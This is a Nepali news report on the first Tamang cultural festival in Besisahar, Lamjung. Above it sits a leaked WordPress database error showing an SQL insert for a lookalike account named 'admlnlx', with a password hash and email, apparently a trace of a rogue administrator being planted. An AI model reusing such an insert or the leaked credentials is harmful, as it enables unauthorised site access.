WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BK18SFrLEO34Puwjoyn7CnpyvPo78R/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 12:06:20', '', 'admlnlx', 'admlnlx')
लमजुङ (बेंसीसहर), माघ ८ –
“भाषा धर्म सँस्कृति हाम्रो शान, बचाऔँ आफ्नो पहिचान” भन्ने मूलनाराकासाथ प्रथम ऐतिहासिक तामाङ साँस्कृतिक महोत्सव आजबाट बँेसीसहरको फूलबारीमा सुरु भएको छ ।
तामाङ जातीको साँस्कृतिक पर्व २८५३ औँ सोनाम ल्होछार “नामे झ्या ल्हो”को अवसरमा सो महोत्सव आयोजना गरिएको हो ।
तमाङ जातिको लोप हुन लागेको सँस्कृतिलाई संरक्षण, संवद्र्धन र प्रवद्र्धन गर्ने उद्देश्यले आयोजित उक्त महोत्सवमा तामाङ जातिको फोटो प्रदर्शनी, लामा सङ्ग्रहालय, तामाङ सांस्कृतिक सङ्ग्रहालय, बोन्बो सङ्ग्रहालय, तामाङ जातिको लिपिवद्ध सामग्रीको पुस्तकालय, तमाङ खाना परिकार, लामा प्रशिक्षण, ताम्बो प्रशिक्षणलगायत तामाङ जातिको पहिचान झल्कने स्टल राखिएको छ ।
महोत्सवमा राष्ट्रिय तथा स्थानीय कलाकारद्वारा सांङ्गतीक कार्यक्रमसमेत गरिने नेपाल तामाङ घेदुङ जिल्ला कार्यसमिति लमजुङले जनाएको छ । – रासस